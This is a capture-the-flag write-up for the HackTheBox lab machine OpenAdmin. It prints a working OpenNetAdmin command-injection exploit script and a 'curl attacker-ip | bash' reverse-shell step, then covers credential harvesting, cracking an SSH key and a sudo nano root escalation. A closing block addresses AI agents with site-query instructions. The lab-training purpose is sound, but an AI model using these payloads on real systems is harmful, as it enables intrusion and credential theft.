# OpenAdmin OpenAdmin is an easy-rated Windows machine from [HackTheBox](https://app.hackthebox.com/machines/OpenAdmin) created by del\_KZx497Ju. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.214.71. This machine is straightforward once you find the Admin login page. It features an outdated OpenNetAdmin CMS. From here, you can move to enter the machine as a low privileged user, then jump to a second user by using its credentials located at a local application, then escalate by a sudo misconfiguration with nano. ### Gather Information Before doing anything, always start using ping to see if this is working {% code title="Local Terminal" %} ```bash ping -c 1 10.129.214.71 ``` {% endcode %}

Output, the TTL is close to 64 so it is a Linux related machine

{% code title="Local Terminal" %} ```bash nmap -p- --open -T5 -v -n 10.129.214.71 ``` {% endcode %}

Nmap’s output, looks like a simple website.

{% code title="Local Terminal" %} ```bash nmap -sC -sV -p 22,80 10.129.214.71 ``` {% endcode %}

{% code title="Local Terminal" %} ```bash whatweb http://10.129.214.71 ``` {% endcode %}

Right now the best option is to explore the website content. * Browser:

Definitively is just an Ubuntu Default Page, nothing special, unless you press CTRL+U

Still, default information, there is nothing relevant at https://launchpad.net/bugs/1288690

At this moment, we don’t have any important information, our best option is to search for resources. So we are going to use Wfuzz in colorized format (-c) with 200 threats (-t 200) using a dictionary (-w), while hiding the response status 404 (--hc=404), add try at FUZZ {% code title="Local Terminal" %} ```bash wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.219.214.71/FUZZ ``` {% endcode %}

Bugged output from WFuzz, will be fixed in future post.

Ok, there are three payloads that make sense, let’s try with “artwork”, then “music”, and “sierra” * Browser:

After exploring the website, I didn’t found anything.

* Browser:

After exploring, there was something only at **Login**, this looks like a Content Manager

Let’s search if “OpenNetAdmin” have vulnerabilities at the database. {% code title="Local Terminal" %} ```bash searchsploit OpenNetAdmin ``` {% endcode %}

### Weaponization and Exploitation Look, there is a bash script for the version 18.1.1, this means that we can use that exploit. Copy and paste the code from to a file called exploit.sh, and at URL, paste the target ONA URL and run the script. {% code title="Exploit.sh" %} ```bash #!/bin/bash URL="http://10.129.214.71/ona/" while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done ``` {% endcode %} {% code title="Local Terminal" %} ```bash .\exploit.sh ``` {% endcode %}

It works, this bash prompt will be **TargetTerminal** as user www-data

And now, to improve our terminal, we need to create an html file and oblige the target to read it. Open two terminals, **TermA** and **TermB**. {% code title="Local Terminal A" %} ```bash vi index.html python3 -m http.server 80 ``` {% endcode %}

{% code title="Local Terminal B" %} ```bash nc -nlvp 443 ``` {% endcode %} {% code title="Target Terminal" %} ```bash curl 10.10.14.76 | bash ``` {% endcode %} Read the file from 10.10.14.76 with bash

We are in, now the TermB is **TargetTerminal** as **www-data**

Now our best option is to do an [tty treatment.](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md) {% code title="Target Terminal" %} ```bash grep -r -i -E "user|pass|key|database" cd /home/ find \-name user.txt 2>/dev/null #Nothing, there is a permission issue find \-name user.txt ``` {% endcode %}

Now we need to hunt for their passwords to login {% code title="Target Terminal" %} ```bash cd /opt/ona/www find \-type f 2>/dev/null | grep "config" ``` {% endcode %}

We found something with an interesting name.

{% code title="Target Terminal" %} ```bash cat ./local/config/database_settings.inc.php ``` {% endcode %}

{% code title="Target Terminal" %} ```bash grep "sh$" /etc/passwd ``` {% endcode %}

We have a password, so now we can test that with every user {% code title="Target Terminal" %} ```bash su jimmy ``` {% endcode %}

It was Jimmy’s password, now your Target Terminal is user Jimmy

{% code title="Target Terminal - Jimmy" %} ```bash cd /var/www/internal ls cat main.php ``` {% endcode %}

Ok, now we are going to check the configuration. {% code title="Target Terminal - Jimmy" %} ```bash ls /etc/apache2/sites-available/ cat /etc/apache2/sites-available/internal.conf ``` {% endcode %}

There is something in that port, let’s try a curl to prove is exist, if this exist, by using that location we will be able to execute commands as the user “Joanna” and execute main.php

{% code title="Target Terminal - Jimmy" %} ```bash curl localhost:52846/reverseShell.php ``` {% endcode %}

Is nice to know that, but previously we see that in main.php, we can call the RSA Private Key of the user Joanna, is an easier way. {% code title="Target Terminal - Jimmy" %} ```bash curl localhost:52846/main.php ``` {% endcode %}

Paste the content in a file in your local machine and open a Terminal. {% code title="Local Terminal" %} ```bash vi id_rsa #paste the key inside chmod 600 id_rsa ssh -i id_rsa joanna@10.129.214.71 ``` {% endcode %}

But hey, it does not works, this is because the id\_rsa is encrypted, you can see that in the second row {Proc-Type: 4, ENCRYPTED}, first we need to download the tool , and decrypt the id\_rsa. {% code title="Local Terminal" %} ```bash python3 ssh2john.py id_rsa > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash #password: bloodninjas ssh -i id_rsa joanna@10.129.214.71 ``` {% endcode %}

{% code title="Target Terminal - Joanna" %} ```bash ls cat user.txt ``` {% endcode %}

### Privileges Scalation {% code title="Target Terminal - Joanna" %} ```bash cd /root/ #you can't enter id #To see the groups sudo -l ``` {% endcode %}

File that can be executed as root using user joanna, in this case: Command **nano**

As you can see, we can execute the command **nano** to the file /opt/priv without passwords. This means that we can execute commands inside that file without requiring a password {% code title="Target Terminal - Joanna" %} ```bash sudo -u root nano /opt/priv #CTRL+R for read files, then CTRL+X to execute commands ``` {% endcode %}

It works, this is a nice chance to give admin permission as root to the **/bin/bash** file for every user.

{% code title="Target Terminal - Joanna" %} ```bash bash -p ``` {% endcode %} {% code title="Target Root" %} ```bash cat root.txt ``` {% endcode %}

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/openadmin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.